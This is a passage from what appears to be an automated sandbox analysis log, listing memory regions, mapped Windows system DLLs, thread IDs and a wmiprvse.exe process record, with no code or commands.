	              id = 3200
	        start_va = 0x203f2bb0000
	          end_va = 0x203f3faffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000203f2bb0000"
	        filename = ""

Region:
	              id = 3201
	        start_va = 0x203f2640000
	          end_va = 0x203f264ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000203f2640000"
	        filename = ""

Region:
	              id = 3208
	        start_va = 0x29d8a80000
	          end_va = 0x29d8abffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000029d8a80000"
	        filename = ""

Region:
	              id = 3209
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 3210
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 3215
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 3216
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 3217
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 3218
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 3219
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 3220
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 3221
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 3223
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 3224
	        start_va = 0x203f3fb0000
	          end_va = 0x203f410ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000203f3fb0000"
	        filename = ""

Region:
	              id = 3226
	        start_va = 0x203f4110000
	          end_va = 0x203f4446fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 3227
	        start_va = 0x203f2650000
	          end_va = 0x203f2670fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 3228
	        start_va = 0x203f2780000
	          end_va = 0x203f27d9fff
	       monitored = 1
	     entry_point = 0x203f27953f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 3229
	        start_va = 0x203f2880000
	          end_va = 0x203f288ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000203f2880000"
	        filename = ""

Region:
	              id = 3230
	        start_va = 0x203f4450000
	          end_va = 0x203f4662fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000203f4450000"
	        filename = ""

Region:
	              id = 3231
	        start_va = 0x203f4670000
	          end_va = 0x203f4883fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000203f4670000"
	        filename = ""

Region:
	              id = 3232
	        start_va = 0x203f3fb0000
	          end_va = 0x203f40c6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000203f3fb0000"
	        filename = ""

Region:
	              id = 3233
	        start_va = 0x203f4100000
	          end_va = 0x203f410ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000203f4100000"
	        filename = ""

Region:
	              id = 3234
	        start_va = 0x203f4890000
	          end_va = 0x203f4aa1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000203f4890000"
	        filename = ""

Region:
	              id = 3235
	        start_va = 0x203f4ab0000
	          end_va = 0x203f4bc4fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000203f4ab0000"
	        filename = ""

Region:
	              id = 3237
	        start_va = 0x29d8ac0000
	          end_va = 0x29d8afffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000029d8ac0000"
	        filename = ""

Region:
	              id = 3238
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 3239
	        start_va = 0x203f2650000
	          end_va = 0x203f2650fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000203f2650000"
	        filename = ""

Region:
	              id = 3240
	        start_va = 0x203f2780000
	          end_va = 0x203f283bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000203f2780000"
	        filename = ""

Region:
	              id = 3241
	        start_va = 0x203f2650000
	          end_va = 0x203f2653fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000203f2650000"
	        filename = ""

Region:
	              id = 3242
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 3243
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 3244
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 3249
	        start_va = 0x203f2660000
	          end_va = 0x203f2666fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000203f2660000"
	        filename = ""

Region:
	              id = 3250
	        start_va = 0x203f2670000
	          end_va = 0x203f2670fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000203f2670000"
	        filename = ""

Region:
	              id = 3251
	        start_va = 0x203f2840000
	          end_va = 0x203f2840fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000203f2840000"
	        filename = ""

Region:
	              id = 3252
	        start_va = 0x203f2850000
	          end_va = 0x203f2854fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 3257
	        start_va = 0x203f2860000
	          end_va = 0x203f2860fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 3258
	        start_va = 0x203f2870000
	          end_va = 0x203f2871fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000203f2870000"
	        filename = ""

Region:
	              id = 3259
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 3260
	        start_va = 0x203f40d0000
	          end_va = 0x203f40d0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 3261
	        start_va = 0x203f40e0000
	          end_va = 0x203f40e1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000203f40e0000"
	        filename = ""


Thread:
	id = 256
	os_tid = 0xc58


Thread:
	id = 257
	os_tid = 0xc5c


Thread:
	id = 259
	os_tid = 0xc64


Thread:
	id = 261
	os_tid = 0xc6c


Process:
	id = "43"
	image_name = "wmiprvse.exe"
	filename = "c:\\windows\\syswow64\\wbem\\wmiprvse.exe"
	page_root = "0x2e91b000"
	os_pid = "0xc80"
	os_integrity_level = "0x4000"
	os_privileges = "0x60800000"
	monitor_reason = "rpc_server"
	parent_id = "37"
	os_parent_pid = "0x274"
	cmd_line = "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\Network Service"
	bitness = "32"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000b2197" [0xc000000f]

Region:
	              id = 3271
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 3272
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 3273
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 3274
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 3275
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 3276
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 3277
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 3278
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 3279
	        start_va = 0x640000
	          end_va = 0x640fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000640000"
	        filename = ""

Region:
	              id = 3280
	        start_va = 0x1070000
	          end_va = 0x10d9fff
	       monitored = 0
	     entry_point = 0x108cd20
	     region_type = mapped_file
	            name = "wmiprvse.exe"
	        filename = "\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmiprvse.exe")

Region:
	              id = 3281
	        start_va = 0x10e0000
	          end_va = 0x50dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000010e0000"
	        filename = ""

Region:
	              id = 3282
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 3283
	        start_va = 0x7e670000
	          end_va = 0x7e692fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e670000"
	        filename = ""

Region:
	              id = 3284
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 3285
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 3286
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 3287
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 3288
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 3357
	        start_va = 0x510000
	          end_va = 0x51ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000510000"
	        filename = ""

Region:
	              id = 3358
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 3359
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 3360
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3379
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 3380
	        start_va = 0x650000
	          end_va = 0x7affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000650000"
	        filename = ""

Region:
	              id = 3383
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3384
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 3387
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 3388
	        start_va = 0x7e570000
	          end_va = 0x7e66ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e570000"
	        filename = ""

Region:
	              id = 3389
	        start_va = 0x100000
	          end_va = 0x1bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 3394
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 3395
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 3396
	        start_va = 0x400000
	          end_va = 0x43ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 3397
	        start_va = 0x640000
	          end_va = 0x64dfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000640000"
	        filename = ""

Region:
	              id = 3398
	        start_va = 0x6f560000
	          end_va = 0x6f61efff
	       monitored = 0
	     entry_point = 0x6f591e80
	     region_type = mapped_file
	            name = "fastprox.dll"
	        filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll")

Region:
	              id = 3399
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 3400
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 3404
	        start_va = 0x6f540000
	          end_va = 0x6f551fff
	       monitored = 0
	     entry_point = 0x6f545660
	     region_type = mapped_file
	            name = "ncobjapi.dll"
	        filename = "\\Windows\\SysWOW64\\ncobjapi.dll" (normalized: "c:\\windows\\syswow64\\ncobjapi.dll")

Region:
	              id = 3405
	        start_va = 0x6f7d0000
	          end_va = 0x6f836fff
	       monitored = 1
	     entry_point = 0x6f7eb610
	     region_type = mapped_file
	            name = "wbemcomn.dll"
	        filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll")

Region:
	              id = 3406
	        start_va = 0x71110000
	          end_va = 0x7112afff
	       monitored = 0
	     entry_point = 0x71119050
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")

Region:
	              id = 3407
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 3408
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 3409
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 3410
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 3411
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 3412
	        start_va = 0x7b0000
	          end_va = 0x95ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007b0000"
	        filename = ""

Region:
	              id = 3426
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 3427
	        start_va = 0x960000
	          end_va = 0xc96fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 3428
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 3429
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 3440
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 3441
	        start_va = 0x440000
	          end_va = 0x4fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000440000"
	        filename = ""

Region:
	              id = 3442
	        start_va = 0x500000
	          end_va = 0x500fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000500000"
	        filename = ""

Region:
	              id = 3443
	        start_va = 0x7b0000
	          end_va = 0x937fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007b0000"
	        filename = ""

Region:
	              id = 3444
	        start_va = 0x950000
	          end_va = 0x95ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000950000"
	        filename = ""

Region:
	              id = 3445
	        start_va = 0xca0000
	          end_va = 0xe20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000ca0000"
	        filename = ""

Region:
	              id = 3446
	        start_va = 0x650000
	          end_va = 0x654fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui")

Region:
	              id = 3447
	        start_va = 0x6b0000
	          end_va = 0x7affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000006b0000"
	        filename = ""

Region:
	              id = 3448
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 3688
	        start_va = 0x660000
	          end_va = 0x660fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000660000"
	        filename = ""

Region:
	              id = 3691
	        start_va = 0x520000
	          end_va = 0x55ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000520000"
	        filename = ""

Region:
	              id = 3692
	        start_va = 0x560000
	          end_va = 0x59ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000560000"
	        filename = ""

Region:
	              id = 3693
	        start_va = 0x670000
	          end_va = 0x67dfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000670000"
	        filename = ""

Region:
	              id = 3694
	        start_va = 0xe30000
	          end_va = 0xf2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000e30000"
	        filename = ""

Region:
	              id = 3695
	        start_va = 0x680000
	          end_va = 0x680fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000680000"
	        filename = ""

Region:
	              id = 3696
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 3697
	        start_va = 0x690000
	          end_va = 0x690fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000690000"
	        filename = ""

Region:
	              id = 3702
	        start_va = 0x6f840000
	          end_va = 0x6f84cfff
	       monitored = 0
	     entry_point = 0x6f843520
	     region_type = mapped_file
	            name = "wbemprox.dll"
	        filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll")

Region:
	              id = 3703
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 3704
	        start_va = 0xf30000
	          end_va = 0x1019fff
	       monitored = 0
	     entry_point = 0xf6d650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 3786
	        start_va = 0x5a0000
	          end_va = 0x5dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005a0000"
	        filename = ""

Region:
	              id = 3787
	        start_va = 0x5e0000
	          end_va = 0x61ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005e0000"
	        filename = ""

Region:
	              id = 3788
	        start_va = 0xf30000
	          end_va = 0xf6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000f30000"
	        filename = ""

Region:
	              id = 3789
	        start_va = 0xf70000
	          end_va = 0xfaffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000f70000"
	        filename = ""

Region:
	              id = 3790
	        start_va = 0xfb0000
	          end_va = 0xfeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000fb0000"
	        filename = ""

Region:
	              id = 3791
	        start_va = 0xff0000
	          end_va = 0x102ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000ff0000"
	        filename = ""

Region:
	              id = 3837
	        start_va = 0x6f620000
	          end_va = 0x6f630fff
	       monitored = 0
